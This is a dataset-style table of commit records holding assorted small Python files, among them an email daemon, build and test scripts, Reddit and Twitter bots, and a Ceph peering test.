commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
a02b2866a3bf6067a2ee7f6d194c52c0a4d4500e | Create welcome_email_daemon.py | rupertsmall/food_coop | welcome_email_daemon.py | welcome_email_daemon.py | #send new members a welcome email
from smtplib import SMTP as smtp
from time import sleep
def welcome_bot():
fp = open('busters','r')
np = open('welcomed','a')
for eachline in fp:
if not is_in(eachline.strip()):
send_welcome(eachline.strip())
np.write(eachline.strip()+'\n')
fp.close()
np.close()
def is_in(email):
is_in_welcomed = False
mp = open('welcomed','r')
for eachline in mp:
if eachline.strip() == email: is_in_welcomed = True
return is_in_welcomed
mp.close()
def send_welcome(email):
FROM = 'customer_services@my_domain.com'
TO = email
BODY_success = "\r\nThankyou for joining the Food Coop! To make an order go to www.my_website.com\r\n\
Pick the items you want and copy-paste the code to customer_services@my_domain.com with the \
subject line of the email set to 'food' (all lower-case letters and without the quotation marks)\r\n\r\n\
If your order is successful you'll receive a confirmation email from the Food Coop within 5 minutes \
of you sending in your order\r\n\r\n\
Pickup is on Wednesday on Mars (on the first floor of the Food Department. We will put signs up \
on the day) from 12 to 3pm. See you there!\r\n\r\nThe Food Coop Team\r\n(automated email. \
write to customer_services@my_domain.com if you're having trouble)\r\n"
SUBJECT_success = "Food Coop membership"
message = 'From: ' + FROM + '\r\nTo: ' + TO + '\r\nSubject: ' + SUBJECT_success + '\r\n\r\n' + BODY_success
SMTPSERVER = 'localhost'
sendserver = smtp(SMTPSERVER)
errors = sendserver.sendmail(FROM, TO, message)
sendserver.quit()
if len(errors) != 0:
lp = open('welcome_errors', 'a')
for eachline in errors:
lp.write(eachline+'\n')
lp.write('\n\n')
lp.close()
while True:
sleep(10)
welcome_bot()
| mit | Python |
|
a892a389cfc94ebf72579ed6888c02463cdf7e6d | add moviepy - text_erscheinen_lassen_rechts2links.py | openscreencast/video_snippets,openscreencast/video_snippets | moviepy/text_erscheinen_lassen_rechts2links.py | moviepy/text_erscheinen_lassen_rechts2links.py | #!/usr/bin/env python
# Video mit Text erzeugen, Text von rechts nach links erscheinen lassen
# Einstellungen
text = 'Text' # Text
textgroesse = 150 # Textgroesse in Pixel
textfarbe_r = 0 # Textfarbe R
textfarbe_g = 0 # Textfarbe G
textfarbe_b = 0 # Textfarbe B
schrift = 'FreeSans' # Schriftart
winkel = 0 # Winkel
hgfarbe_r = 1 # Hintergrundfarbe R
hgfarbe_g = 1 # Hintergrundfarbe G
hgfarbe_b = 1 # Hintergrundfarbe B
videobreite = 1280 # in Pixel
videohoehe = 720 # in Pixel
videolaenge = 5 # in Sekunden
videodatei = 'text.ogv' # Videodatei
frames = 25 # Frames pro Sekunde
# Modul moviepy importieren
from moviepy.editor import *
# Modul gizeh importieren
import gizeh
# Funktion um Frames zu erzeugen, t ist die Zeit beim jeweiligen Frame
def create_frame(t):
img = gizeh.Surface(videobreite,videohoehe,bg_color=(hgfarbe_r,hgfarbe_g,hgfarbe_b))
text_img = gizeh.text(text, fontfamily=schrift, fontsize=textgroesse,
fill=(textfarbe_r,textfarbe_g,textfarbe_b),
xy=(videobreite/2,videohoehe/2), angle=winkel)
rect_img = gizeh.rectangle(lx=videobreite, ly=videohoehe, xy=(videobreite/2-t*videobreite/videolaenge,videohoehe/2), fill=(hgfarbe_r,hgfarbe_g,hgfarbe_b), angle=winkel)
text_img.draw(img)
rect_img.draw(img)
return img.get_npimage()
# Video erzeugen
video = VideoClip(create_frame, duration=videolaenge)
# Video schreiben
video.write_videofile(videodatei, fps=frames)
# Hilfe fuer moviepy: https://zulko.github.io/moviepy/index.html
# Hilfe fuer gizeh: https://github.com/Zulko/gizeh
# text_erscheinen_lassen_rechts2links.py
# Lizenz: http://creativecommons.org/publicdomain/zero/1.0/
# Author: openscreencast.de
| cc0-1.0 | Python |
|
5db0ef459f4b0f0d3903578ae89bef7d0de7bf98 | add terminal test file | fouric/lightning-cd | termtest.py | termtest.py | #!/usr/bin/python3
import termbox
t = termbox.Termbox()
t.clear()
width = t.width()
height = t.height()
cell_count = width * height
char = ord('a')
for c in range(1):
for i in range(26):
for y in range(height):
for x in range(width):
t.change_cell(x, y, char, termbox.WHITE, termbox.BLACK)
t.present()
char += 1
t.close()
| mit | Python |
|
3d8667d2bfd75fe076b15b171e5c942a2a358508 | add basic is_unitary tests | cjwfuller/quantum-circuits | test_gate.py | test_gate.py | import numpy as np
import unittest
import gate
class TestGate(unittest.TestCase):
def test_is_unitary(self):
qg = gate.QuantumGate(np.matrix('0 1; 1 0', np.complex_))
self.assertTrue(qg.is_unitary())
def test_is_not_unitary(self):
matrix = np.matrix('1 1; 1 0', np.complex_)
self.failUnlessRaises(Exception, gate.QuantumGate, matrix)
if __name__ == '__main__':
unittest.main()
| mit | Python |
|
bf0a4ee5023cddd4072330e9a3e5a530aeea956e | test unit added | laxect/scale,laxect/scale | test_unit.py | test_unit.py | class test_output:
def run(self, queue):
while True:
item = queue.get()
print(item)
def mod_init():
return test_output()
| mit | Python |
|
33e2f5a0a11d5474b7a9f1ad3989575831f448ee | Add initial version of 'testbuild.py'. Currently this tests compilation of the CRYENGINE repo in win_x86/profile mode. Installed VS versions are discovered by querying the registry. Settings are in the script itself in the USED_* variables (to be abstracted later). Support for additional platforms and configs will be added later. | patsytau/ce_tools | testbuild.py | testbuild.py | import os
import platform
import subprocess
# Group these here for transparency and easy editing.
USED_REPOSITORY = 'CRYENGINE'
USED_TARGET = 'win_x86'
USED_CONFIG = 'Profile'
USED_BRANCH = 'release'
USED_VS_VERSION = '14.0'
TARGET_TO_SLN_TAG = {
'win_x86': 'Win32',
'win_x64': 'Win64'
}
def get_installed_vs_versions():
"""
Query the registry to find installed VS versions. Assumes that C++ support has been installed.
Throws an exception if the expected version of VS is not present.
:return: None
"""
import winreg
# Open the Visual Studio registry key.
reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)
vskey = winreg.OpenKey(reg, r'SOFTWARE\Microsoft\VisualStudio')
subkeys = []
# Read all the subkeys
try:
i = 0
while True:
subkeys.append(winreg.EnumKey(vskey, i))
i += 1
except OSError:
pass
# If a subkey includes '.0' it's almost certainly a version number. I've yet to see one without that.
available_versions = [version for version in subkeys if '.0' in version]
if USED_VS_VERSION not in available_versions:
raise OSError('Visual Studio version {} is not installed (available: {}).'.format(USED_VS_VERSION,
available_versions))
def main():
"""
Get code from GitHub and perform an incremental build.
Assumes that the required SDKs directory is called 'SDKs' and is directly adjacent to the repo checkout directory.
"""
repository = USED_REPOSITORY
branch = USED_BRANCH
target = USED_TARGET
config = USED_CONFIG
build_dir = '_'.join([target, config.lower()])
steps = {
'clone': ['git', 'clone', 'https://github.com/CRYTEK-CRYENGINE/{repo}.git'.format(repo=repository)],
'pull': ['git', '-C', repository, 'pull'],
'checkout': ['git', 'checkout', branch],
# Quietly remove files that aren't tracked by git but leave the build folder in place (for incremental builds).
'clean': ['git', 'clean', '-dfq', '-e', 'Code/SDKs', '-e', build_dir],
# For now, assume Windows for convenience.
'configure': ['cmake', r'-DCMAKE_TOOLCHAIN_FILE=Tools\CMake\toolchain\windows\WindowsPC-MSVC.cmake', '..'],
'build': [os.path.normpath(r'C:\Program Files (x86)\MSBuild\{}\Bin\MSBuild.exe'.format(USED_VS_VERSION)),
'/property:Configuration={}'.format(config),
'CryEngine_CMake_{}.sln'.format(TARGET_TO_SLN_TAG.get(target))]
}
if os.path.exists(repository):
runstep(steps, 'pull')
else:
runstep(steps, 'clone')
os.chdir(repository)
runstep(steps, 'checkout')
runstep(steps, 'clean')
if os.path.exists(os.path.join('Code', 'SDKs')):
if platform.system() == 'Windows':
subprocess.check_call(['rmdir', r'Code\SDKs'], shell=True)
if not os.path.exists(os.path.join('Code', 'SDKs')):
if platform.system() == 'Windows':
subprocess.check_call(['mklink', '/J', r'Code\SDKs', r'..\SDKs'], shell=True)
print('Changing to build directory: {}'.format(build_dir))
if not os.path.exists(build_dir):
os.mkdir(build_dir)
os.chdir(build_dir)
runstep(steps, 'configure')
runstep(steps, 'build')
os.chdir('..')
if platform.system() == 'Windows':
subprocess.check_call(['rmdir', r'Code\SDKs'], shell=True)
runstep(steps, 'clean')
def runstep(steps, name):
"""
Run the command from *steps* corresponding to *name*.
:param steps: Dictionary of steps that can be run.
:param name: Name of the step to run.
"""
print('Running {} step with command "{}".'.format(name, ' '.join(steps[name])))
subprocess.check_call(steps[name])
if __name__ == '__main__':
main()
| mit | Python |
|
6764d0286f2386bef8ab5f627d061f45047956e9 | add logger | saltastro/timDIMM,saltastro/timDIMM,saltastro/timDIMM,saltastro/timDIMM | logger.py | logger.py | #!/usr/bin/env python
import logging
import os
from termcolor import colored
class ColorLog(object):
colormap = dict(
debug=dict(color='grey', attrs=['bold']),
info=dict(color='green'),
warn=dict(color='yellow', attrs=['bold']),
warning=dict(color='yellow', attrs=['bold']),
error=dict(color='red'),
critical=dict(color='red', attrs=['bold']),
)
def __init__(self, logger):
self._log = logger
def __getattr__(self, name):
if name in ['debug', 'info', 'warn', 'warning', 'error', 'critical']:
return lambda s, *args: getattr(self._log, name)(
colored(s, **self.colormap[name]), *args)
return getattr(self._log, name)
# Initialize logger
logging.basicConfig(format="%(levelname)s: %(name)s - %(message)s", level=logging.INFO)
fh = logging.FileHandler("timDIMM.log")
fh.setLevel(logging.DEBUG)
fh.setFormatter(logging.Formatter("%(asctime)s: %(levelname)s - %(name)s - %(message)s"))
| bsd-3-clause | Python |
|
6a426523186180a345777b7af477c12473fd3aa0 | add human moderator actions to file | conversationai/conversationai-moderator-reddit,conversationai/conversationai-moderator-reddit,conversationai/conversationai-moderator-reddit,conversationai/conversationai-moderator-reddit | perspective_reddit_bot/check_mod_actions.py | perspective_reddit_bot/check_mod_actions.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A reddit bot to detect which actions subreddit moderators actually took."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
from datetime import datetime
import json
import praw
import time
from creds import creds
def write_moderator_actions(reddit,
line,
id_key,
timestamp_key,
output_path,
hours_to_wait):
record = json.loads(line)
comment = reddit.comment(record[id_key])
maybe_wait(record[timestamp_key], hours_to_wait)
record['approved'] = comment.approved
record['removed'] = comment.removed
with open(output_path, 'a') as o:
json.dump(record, o)
o.write('\n')
def maybe_wait(timestamp, hours_to_wait):
"""Waits until hours_to_wait hours have passed since timestamp"""
now = datetime.utcnow()
time_diff = now - datetime.strptime(timestamp, '%Y%m%d_%H%M%S')
time_diff = time_diff.seconds
seconds_to_wait = hours_to_wait * 3600
if time_diff < seconds_to_wait:
time_to_wait = seconds_to_wait - time_diff
print('Waiting %.1f seconds...' % time_to_wait)
time.sleep(time_to_wait)
def _main():
parser = argparse.ArgumentParser(
'Reads the output of moderate_subreddit.py and adds actions taken by'
'human moderators.')
parser.add_argument('input_path', help='json file with reddit comment ids')
parser.add_argument('output_path', help='path to write output file')
parser.add_argument('-id_key', help='json key containing reddit comment id',
default='comment_id')
parser.add_argument('-timestamp_key', help='json key containing timestamp'
'that moderation bot saw comment',
default='bot_review_utc')
parser.add_argument('-hours_to_wait',
help='the number of hours to wait to allow moderators to'
' respond to bot',
type=int,
default=12)
parser.add_argument('-stop_at_eof',
help='if set, stops the process once the end of file is '
'hit instead of waiting for new comments to be written',
action='store_true')
args = parser.parse_args()
reddit = praw.Reddit(client_id=creds['reddit_client_id'],
client_secret=creds['reddit_client_secret'],
user_agent=creds['reddit_user_agent'],
username=creds['reddit_username'],
password=creds['reddit_password'])
with open(args.input_path) as f:
# Loops through the file and waits at EOF for new data to be written.
while True:
where = f.tell()
line = f.readline()
if line:
write_moderator_actions(reddit,
line,
args.id_key,
args.timestamp_key,
args.output_path,
args.hours_to_wait)
else:
if args.stop_at_eof:
return
else:
print('Reached EOF. Waiting for new data...')
time.sleep(args.hours_to_wait * 3600)
f.seek(where)
if __name__ == '__main__':
_main()
| apache-2.0 | Python |
|
9cd3e1183b78f561751a638cf4e863703ec080d6 | add load ini file config | eplaut/nagios-config,eplaut/nagios-config | load_config.py | load_config.py | #!/usr/bin/env python
"""
conf file example
[elk-server]
ip = elk.server.ip
kibana = check_http
elasticsearch = check_http!-p 9200
logstash-3333 = check_tcp!3333
logstash-3334 = check_tcp!3334
load = check_nrpe!check_load
"""
import os, sys
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
parser = ConfigParser()
parser.read(sys.argv[1])
parser.sections()
for section in parser.sections():
os.system('./add_host.sh {} {}'.format(section, parser.get(section, 'ip')))
parser.remove_option(section, 'ip')
for service, command in parser.items(section):
os.system('./add_service_to_host.sh {} {} {}'.format(section, service, command.replace('/', r'\/')))
| apache-2.0 | Python |
|
e559a0458d1e4b0ec578eb9bcfdcc992d439a35d | Add test cases for the backwards compatibility in #24 | mathcamp/flywheel,stevearc/flywheel,stevearc/flywheel,mathcamp/flywheel | tests/test_backwards.py | tests/test_backwards.py | """ Test backwards-compatible behavior """
import json
from flywheel import Field, Model
from flywheel.fields.types import TypeDefinition, DictType, STRING
from flywheel.tests import DynamoSystemTest
class JsonType(TypeDefinition):
""" Simple type that serializes to JSON """
data_type = json
ddb_data_type = STRING
def coerce(self, value, force):
return value
def ddb_dump(self, value):
return json.dumps(value)
def ddb_load(self, value):
return json.loads(value)
class OldDict(Model):
""" Model that uses an old-style json field as a dict store """
__metadata__ = {
'_name': 'dict-test',
}
id = Field(hash_key=True)
data = Field(data_type=JsonType())
class TestOldJsonTypes(DynamoSystemTest):
""" Test the graceful handling of old json-serialized data """
models = [OldDict]
def setUp(self):
super(TestOldJsonTypes, self).setUp()
OldDict.meta_.fields['data'].data_type = JsonType()
def test_migrate_data(self):
""" Test graceful load of old json-serialized data """
old = OldDict('a', data={'a': 1})
self.engine.save(old)
OldDict.meta_.fields['data'].data_type = DictType()
new = self.engine.scan(OldDict).one()
self.assertEqual(new.data, old.data)
def test_resave_old_data(self):
""" Test the resaving of data that used to be json """
old = OldDict('a', data={'a': 1})
self.engine.save(old)
OldDict.meta_.fields['data'].data_type = DictType()
new = self.engine.scan(OldDict).one()
new.data['b'] = 2
new.sync(raise_on_conflict=False)
ret = self.engine.scan(OldDict).one()
self.assertEqual(ret.data, {'a': 1, 'b': 2})
| mit | Python |
|
501c38ac9e8b9fbb35b64321e103a0dfe064e718 | Add a sequence module for optimizing gating | calebjordan/PyQLab,Plourde-Research-Lab/PyQLab,BBN-Q/PyQLab,rmcgurrin/PyQLab | QGL/BasicSequences/BlankingSweeps.py | QGL/BasicSequences/BlankingSweeps.py | """
Sequences for optimizing gating timing.
"""
from ..PulsePrimitives import *
from ..Compiler import compile_to_hardware
def sweep_gateDelay(qubit, sweepPts):
"""
Sweep the gate delay associated with a qubit channel using a simple Id, Id, X90, X90
seqeuence.
Parameters
---------
qubit : logical qubit to create sequences for
sweepPts : iterable to sweep the gate delay over.
"""
generator = qubit.physChan.generator
oldDelay = generator.gateDelay
for ct, delay in enumerate(sweepPts):
seqs = [[Id(qubit, length=120e-9), Id(qubit), MEAS(qubit)],
[Id(qubit, length=120e-9), MEAS(qubit)],
[Id(qubit, length=120e-9), X90(qubit), MEAS(qubit)],
[Id(qubit, length=120e-9), X90(qubit), MEAS(qubit)]]
generator.gateDelay = delay
compile_to_hardware(seqs, 'BlankingSweeps/GateDelay', suffix='_{}'.format(ct+1))
generator.gateDelay = oldDelay
| apache-2.0 | Python |
|
213d1e65ebd6d2f9249d26c7ac3690d6bc6cde24 | fix encoding | Geode/Geocoding,Geode/Geocoding,Geode/Geocoding | manage.py | manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geode_geocoding.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| agpl-3.0 | Python |
|
6107d7fe1db571367a20143fa38fc6bec3056d36 | Fix port for activity script | vmalloc/mailboxer,getslash/mailboxer,getslash/mailboxer,getslash/mailboxer,vmalloc/mailboxer,vmalloc/mailboxer | scripts/activity.py | scripts/activity.py | #!/usr/bin/env python
import argparse
import collections
import itertools
import os
import random
import sys
import time
from contextlib import contextmanager
import logbook
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
from flask_app import app
from flask_app.smtp import smtpd_context
from mailboxer import Mailboxer
parser = argparse.ArgumentParser(usage="%(prog)s [options] args...")
parser.add_argument("--smtp-port", default=None, type=int)
parser.add_argument("--port", default=8000)
class Application(object):
def __init__(self, args):
self._args = args
def main(self):
client = Mailboxer("http://127.0.0.1:{0}".format(self._args.port))
mailboxes = collections.deque(maxlen=5)
with self._get_smtpd_context() as smtp:
for iteration in itertools.count():
if iteration % 3 == 0:
logbook.info("Creating mailbox (#{})", iteration)
mailboxes.append("mailbox{0}@demo.com".format(time.time()))
client.create_mailbox(mailboxes[-1])
logbook.info("Sending email... (#{})", iteration)
smtp.sendmail("noreply@demo.com", [random.choice(mailboxes)], "This is message no. {0}".format(iteration))
time.sleep(5)
return 0
@contextmanager
def _get_smtpd_context(self):
if self._args.smtp_port is None:
with smtpd_context() as result:
yield result
else:
yield SMTP("127.0.0.1", self._args.smtp_port)
#### For use with entry_points/console_scripts
def main_entry_point():
args = parser.parse_args()
app = Application(args)
sys.exit(app.main())
if __name__ == "__main__":
main_entry_point()
| #!/usr/bin/env python
import argparse
import collections
import itertools
import os
import random
import sys
import time
from contextlib import contextmanager
import logbook
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
from flask_app import app
from flask_app.smtp import smtpd_context
from mailboxer import Mailboxer
parser = argparse.ArgumentParser(usage="%(prog)s [options] args...")
parser.add_argument("--smtp-port", default=None, type=int)
parser.add_argument("--port", default=8080)
class Application(object):
def __init__(self, args):
self._args = args
def main(self):
client = Mailboxer("http://127.0.0.1:{0}".format(self._args.port))
mailboxes = collections.deque(maxlen=5)
with self._get_smtpd_context() as smtp:
for iteration in itertools.count():
if iteration % 3 == 0:
logbook.info("Creating mailbox (#{})", iteration)
mailboxes.append("mailbox{0}@demo.com".format(time.time()))
client.create_mailbox(mailboxes[-1])
logbook.info("Sending email... (#{})", iteration)
smtp.sendmail("noreply@demo.com", [random.choice(mailboxes)], "This is message no. {0}".format(iteration))
time.sleep(5)
return 0
@contextmanager
def _get_smtpd_context(self):
if self._args.smtp_port is None:
with smtpd_context() as result:
yield result
else:
yield SMTP("127.0.0.1", self._args.smtp_port)
#### For use with entry_points/console_scripts
def main_entry_point():
args = parser.parse_args()
app = Application(args)
sys.exit(app.main())
if __name__ == "__main__":
main_entry_point()
| mit | Python |
df378f5c555f18ce48fb550ab07c85f779a31c60 | Add script to merge users with duplicate usernames | Nesiehr/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,monikagrabowska/osf.io,chrisseto/osf.io,icereval/osf.io,laurenrevere/osf.io,caneruguz/osf.io,pattisdr/osf.io,CenterForOpenScience/osf.io,adlius/osf.io,brianjgeiger/osf.io,caneruguz/osf.io,sloria/osf.io,erinspace/osf.io,adlius/osf.io,mfraezz/osf.io,Johnetordoff/osf.io,acshi/osf.io,monikagrabowska/osf.io,HalcyonChimera/osf.io,caneruguz/osf.io,baylee-d/osf.io,cwisecarver/osf.io,laurenrevere/osf.io,aaxelb/osf.io,saradbowman/osf.io,brianjgeiger/osf.io,cslzchen/osf.io,adlius/osf.io,icereval/osf.io,binoculars/osf.io,baylee-d/osf.io,aaxelb/osf.io,mattclark/osf.io,caseyrollins/osf.io,HalcyonChimera/osf.io,hmoco/osf.io,pattisdr/osf.io,mfraezz/osf.io,Nesiehr/osf.io,cwisecarver/osf.io,HalcyonChimera/osf.io,CenterForOpenScience/osf.io,Johnetordoff/osf.io,hmoco/osf.io,icereval/osf.io,laurenrevere/osf.io,crcresearch/osf.io,mattclark/osf.io,aaxelb/osf.io,sloria/osf.io,baylee-d/osf.io,sloria/osf.io,cwisecarver/osf.io,monikagrabowska/osf.io,chrisseto/osf.io,saradbowman/osf.io,brianjgeiger/osf.io,erinspace/osf.io,monikagrabowska/osf.io,Johnetordoff/osf.io,leb2dg/osf.io,Nesiehr/osf.io,cwisecarver/osf.io,pattisdr/osf.io,leb2dg/osf.io,mfraezz/osf.io,chennan47/osf.io,Nesiehr/osf.io,binoculars/osf.io,caneruguz/osf.io,TomBaxter/osf.io,acshi/osf.io,monikagrabowska/osf.io,adlius/osf.io,chrisseto/osf.io,crcresearch/osf.io,felliott/osf.io,caseyrollins/osf.io,hmoco/osf.io,Johnetordoff/osf.io,erinspace/osf.io,mattclark/osf.io,binoculars/osf.io,CenterForOpenScience/osf.io,felliott/osf.io,chrisseto/osf.io,mfraezz/osf.io,aaxelb/osf.io,chennan47/osf.io,cslzchen/osf.io,brianjgeiger/osf.io,TomBaxter/osf.io,chennan47/osf.io,TomBaxter/osf.io,acshi/osf.io,caseyrollins/osf.io,acshi/osf.io,cslzchen/osf.io,leb2dg/osf.io,HalcyonChimera/osf.io,hmoco/osf.io,acshi/osf.io,felliott/osf.io,crcresearch/osf.io,leb2dg/osf.io,cslzchen/osf.io | scripts/merge_duplicate_users.py | scripts/merge_duplicate_users.py | """Merge User records that have the same username. Run in order to make user collection
conform with the unique constraint on User.username.
"""
import sys
import logging
from modularodm import Q
from website.app import init_app
from website.models import User
from framework.mongo import database
from framework.transactions.context import TokuTransaction
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def find_primary_and_secondaries(users):
"""Given a list of users with the same username, find the user who should be the primary
user into which the other users will be merged. Return a tuple (primary_user, list_of_secondary_users)
"""
actives = [each for each in users if each.is_active]
# If there is only one active User, that user is the primary
if len(actives) == 1:
primary = actives[0]
# No active users, user who has earliest date_registered is primary
elif len(actives) == 0:
primary = sorted(users, key=lambda user: user.date_registered)[0]
# Multiple active users, take the user with latest date_last_login
else:
users_with_dll = [each for each in actives if each.date_last_login]
if len(users_with_dll) == 0:
raise AssertionError(
'Multiple active users with no date_last_login. '
'Perform the merge manually.'
)
else:
primary = sorted(users_with_dll, key=lambda user: user.date_last_login, reverse=True)[0]
secondaries = list(users)
secondaries.remove(primary)
return primary, secondaries
def main(dry=True):
duplicates = database.user.aggregate([
{
"$group": {
"_id": "$username",
"ids": {"$addToSet": "$_id"},
"count": {"$sum": 1}
}
},
{
"$match": {
"count": {"$gt": 1},
"_id": {"$ne": None}
}
},
{
"$sort": {
"count": -1
}
}
]).get('result')
# [
# {
# 'count': 5,
# '_id': 'duplicated@username.com',
# 'ids': [
# 'listo','fidst','hatma','tchth','euser','name!'
# ]
# }
# ]
logger.info('Found {} duplicate usernames.'.format(len(duplicates)))
for duplicate in duplicates:
logger.info(
'Found {} copies of {}: {}'.format(
len(duplicate.get('ids')),
duplicate.get('_id'),
', '.join(duplicate['ids'])
)
)
users = list(User.find(Q('_id', 'in', duplicate.get('ids'))))
primary, secondaries = find_primary_and_secondaries(users)
for secondary in secondaries:
logger.info('Merging user {} into user {}'.format(secondary._id, primary._id))
# don't just rely on the toku txn and prevent a call to merge_user
# when doing a dry run because merge_user does more than just
# db updateds (mailchimp calls, elasticsearch, etc.)
if not dry:
with TokuTransaction():
primary.merge_user(secondary)
primary.save()
secondary.save()
logger.info('Finished migrating {} usernames'.format(len(duplicates)))
if __name__ == "__main__":
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
init_app(set_backends=True, routes=False)
main(dry=dry)
| apache-2.0 | Python |
|
6c94617d8ea2b66bba6c33fdc9aa81c5161a53f8 | add yaml | chck/nlp,chck/nlp | marcov.py | marcov.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#twitterBot.py
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
#use python-twitter
import twitter
import MeCab
import random
import re
import yaml
_var = open("../API.yaml").read()
_yaml = yaml.load(_var)
api = twitter.Api(
consumer_key = _yaml["consumer_key0"],
consumer_secret = _yaml["consumer_secret0"],
access_token_key = _yaml["access_token0"],
access_token_secret = _yaml["access_token_secret0"]
)
def wakati(text):
t = MeCab.Tagger("-Owakati")
m = t.parse(text)
result = m.rstrip(" \n").split(" ")
return result
def markov(src):
wordlist = wakati(src)
markov = {}
w1=''
for word in wordlist:
if w1:
if(w1)not in markov:
markov[(w1)] = []
markov[(w1)].append(word)
w1=word
count = 0
sentence=''
w1=random.choice(markov.keys())
#カウント数はおこのみで
while count < 50:
if markov.has_key((w1))==True:
tmp = random.choice(markov[(w1)])
sentence += tmp
w1=tmp
count += 1
return sentence
def tweet_friends():
i=0
j=0
friends = api.GetFriends()
tweets = ''
for i in range(len(friends)):
friend_timeline = api.GetUserTimeline(screen_name=friends[i].screen_name)
for j in range(len(friend_timeline)):
#他の人へのツイートは除外
if "@" not in friend_timeline[j].text:
tweets+=friend_timeline[j].text
tweets=str(tweets)
tweets=re.sub('https?://[\w/:%#\$&\?\(\)~\.=\+\-]+',"",tweets)
FriendsTweet = marcov(tweets)
return FriendsTweet
def tweet_own():
i=0
own = api.GetUserTimeline(screen_name='geo_ebi',count=100)
tweets=''
for i in range(len(own)):
if "@" not in own[i].text:
tweets+=own[i].text
tweets=str(tweets)
tweets=re.sub('https?://[\w/:%#\$&\?\(\)~\.=\+\-]+',"",tweets)
OwnTweet = markov(tweets)
return OwnTweet
if random.random()<0.5:
Bot = tweet_own()
print(Bot)
status = api.PostUpdate(Bot)
else:
Bot = tweet_friends()
print(Bot)
status = api.PostUpdate(Bot)
| mit | Python |
|
edbb41e1f897d5e0bab5460d971ffd5917e6d1e6 | add peer task | dmick/teuthology,robbat2/teuthology,ceph/teuthology,tchaikov/teuthology,yghannam/teuthology,zhouyuan/teuthology,tchaikov/teuthology,ceph/teuthology,dreamhost/teuthology,caibo2014/teuthology,t-miyamae/teuthology,ktdreyer/teuthology,dreamhost/teuthology,dmick/teuthology,michaelsevilla/teuthology,caibo2014/teuthology,ivotron/teuthology,SUSE/teuthology,yghannam/teuthology,dmick/teuthology,SUSE/teuthology,zhouyuan/teuthology,ktdreyer/teuthology,SUSE/teuthology,michaelsevilla/teuthology,robbat2/teuthology,ivotron/teuthology,t-miyamae/teuthology | teuthology/task/peer.py | teuthology/task/peer.py | import logging
import ceph_manager
import json
from teuthology import misc as teuthology
log = logging.getLogger(__name__)
def rados(remote, cmd):
log.info("rados %s" % ' '.join(cmd))
pre = [
'LD_LIBRARY_PATH=/tmp/cephtest/binary/usr/local/lib',
'/tmp/cephtest/enable-coredump',
'/tmp/cephtest/binary/usr/local/bin/ceph-coverage',
'/tmp/cephtest/archive/coverage',
'/tmp/cephtest/binary/usr/local/bin/rados',
'-c', '/tmp/cephtest/ceph.conf',
];
pre.extend(cmd)
proc = remote.run(
args=pre,
check_status=False
)
return proc.exitstatus
def task(ctx, config):
"""
Test peering.
"""
if config is None:
config = {}
assert isinstance(config, dict), \
'peer task only accepts a dict for configuration'
first_mon = teuthology.get_first_mon(ctx, config)
(mon,) = ctx.cluster.only(first_mon).remotes.iterkeys()
manager = ceph_manager.CephManager(
mon,
ctx=ctx,
logger=log.getChild('ceph_manager'),
)
while manager.get_osd_status()['up'] < 3:
manager.sleep(10)
manager.raw_cluster_cmd('tell', 'osd.0', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.1', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.2', 'flush_pg_stats')
manager.wait_for_clean()
# something that is always there
dummyfile = '/etc/fstab'
# take on osd down
manager.kill_osd(2)
manager.mark_down_osd(2)
# kludge to make sure they get a map
rados(mon, ['-p', 'data', 'get', 'dummy', '-'])
manager.raw_cluster_cmd('tell', 'osd.0', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.1', 'flush_pg_stats')
manager.wait_for_recovery()
# kill another and revive 2, so that some pgs can't peer.
manager.kill_osd(1)
manager.mark_down_osd(1)
manager.revive_osd(2)
manager.wait_till_osd_is_up(2)
manager.raw_cluster_cmd('tell', 'osd.0', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.2', 'flush_pg_stats')
# look for down pgs
num_down_pgs = 0
pgs = manager.get_pg_stats()
for pg in pgs:
out = manager.raw_cluster_cmd('pg', pg['pgid'], 'query')
j = json.loads('\n'.join(out.split('\n')[1:]))
log.info("json is %s" % j)
assert j['state'] == pg['state']
if pg['state'].count('down'):
num_down_pgs += 1
# verify that it is blocked on osd.1
rs = j['recovery_state']
assert len(rs) > 0
assert rs[0]['name'] == 'Started/Primary/Peering/GetInfo'
assert rs[1]['name'] == 'Started/Primary/Peering'
assert rs[1]['blocked']
assert rs[1]['down_osds_we_would_probe'] == [1]
assert len(rs[1]['peering_blocked_by']) == 1
assert rs[1]['peering_blocked_by'][0]['osd'] == 1
assert num_down_pgs > 0
# bring it all back
manager.revive_osd(1)
manager.wait_till_osd_is_up(1)
manager.raw_cluster_cmd('tell', 'osd.0', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.1', 'flush_pg_stats')
manager.raw_cluster_cmd('tell', 'osd.2', 'flush_pg_stats')
manager.wait_for_clean()
| mit | Python |
|
